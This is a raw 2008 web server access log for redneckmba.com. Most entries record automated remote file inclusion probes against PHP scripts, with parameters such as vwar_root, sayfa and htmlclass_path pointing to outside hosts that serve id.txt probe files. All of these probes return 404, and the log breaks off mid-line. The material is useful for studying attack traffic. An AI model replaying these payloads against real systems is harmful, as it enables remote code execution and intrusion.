202.74.164.79 - - [16/Nov/2008:21:30:50 -0800] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
202.74.164.79 - - [16/Nov/2008:21:30:51 -0800] "GET /logs//modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://oursoultvxq.com/bbs/data/vip/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.redneckmba.com"
66.163.171.207 - - [16/Nov/2008:21:30:53 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
217.172.178.237 - - [16/Nov/2008:21:30:56 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.redneckmba.com"
217.172.178.237 - - [16/Nov/2008:21:30:56 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "www.redneckmba.com"
217.172.178.237 - - [16/Nov/2008:21:31:54 -0800] "GET /logs/access.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "redneckmba.com"
217.172.178.237 - - [16/Nov/2008:21:31:55 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "redneckmba.com"
217.172.178.237 - - [16/Nov/2008:21:31:55 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.107.getplex.com/bbs/id? HTTP/1.1" 404 275 "-" "libwww-perl/5.69" "redneckmba.com"
195.12.53.176 - - [16/Nov/2008:21:32:13 -0800] "GET /index.php?redir=http://www.geocities.com/arifferoza/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/4.61 [en] (OS/2; U)" "www.redneckmba.com"
77.234.201.114 - - [16/Nov/2008:21:33:13 -0800] "GET /logs/access.log//main.php?sayfa=http://www.miresici.ro/users/titiid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "redneckmba.com"
77.234.201.114 - - [16/Nov/2008:21:33:14 -0800] "GET /main.php?sayfa=http://www.miresici.ro/users/titiid.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "redneckmba.com"
216.117.148.88 - - [16/Nov/2008:21:33:47 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "redneckmba.com"
77.234.201.114 - - [16/Nov/2008:21:34:36 -0800] "GET /main.php?sayfa=http://www.miresici.ro/users/titiid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
77.234.201.114 - - [16/Nov/2008:21:34:40 -0800] "GET /logs/access.log//main.php?sayfa=http://www.miresici.ro/users/titiid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
77.234.201.114 - - [16/Nov/2008:21:34:41 -0800] "GET /main.php?sayfa=http://www.miresici.ro/users/titiid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
77.234.201.114 - - [16/Nov/2008:21:34:41 -0800] "GET /logs//main.php?sayfa=http://www.miresici.ro/users/titiid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "redneckmba.com"
216.117.148.88 - - [16/Nov/2008:21:35:11 -0800] "GET /phphtml.php?htmlclass_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
76.13.123.194 - - [16/Nov/2008:21:35:48 -0800] "GET /blog/?feed=rss2 HTTP/1.1" 404 275 "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
77.234.201.114 - - [16/Nov/2008:21:36:05 -0800] "GET /logs//main.php?sayfa=http://www.miresici.ro/users/titiid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
77.234.201.114 - - [16/Nov/2008:21:36:05 -0800] "GET /logs//main.php?sayfa=http://www.miresici.ro/users/titiid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
77.234.201.114 - - [16/Nov/2008:21:36:05 -0800] "GET /main.php?sayfa=http://www.miresici.ro/users/titiid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
77.234.201.114 - - [16/Nov/2008:21:36:05 -0800] "GET /main.php?sayfa=http://www.miresici.ro/users/titiid.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.redneckmba.com"
216.117.148.88 - - [16/Nov/2008:21:39:58 -0800] "GET /logs/access.log/phphtml.php?htmlclass_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
216.117.148.88 - - [16/Nov/2008:21:39:58 -0800] "GET /phphtml.php?htmlclass_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
216.117.148.88 - - [16/Nov/2008:21:39:58 -0800] "GET /logs/phphtml.php?htmlclass_path=http://220.134.244.157/xoops/templates_c/id3.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.redneckmba.com"
70.38.54.118 - - [16/Nov/2008:21:42:41 -0800] "GET /logs//components/com_rwcards/captcha/captcha_image.php?img=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.redneckmba.com"
70.38.54.118 - - [16/Nov/2008:21:42:41 -0800] "GET /components/com_rwcards/captcha/captcha_image.php?img=http://opnatur.com/components/com_exposeprive/expose/manager/misc/id-as.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.814" "www.redneckmba.com"
70.38.54.118 - - [16/Nov/2008:21:42:41 -0800] "GET /logs/a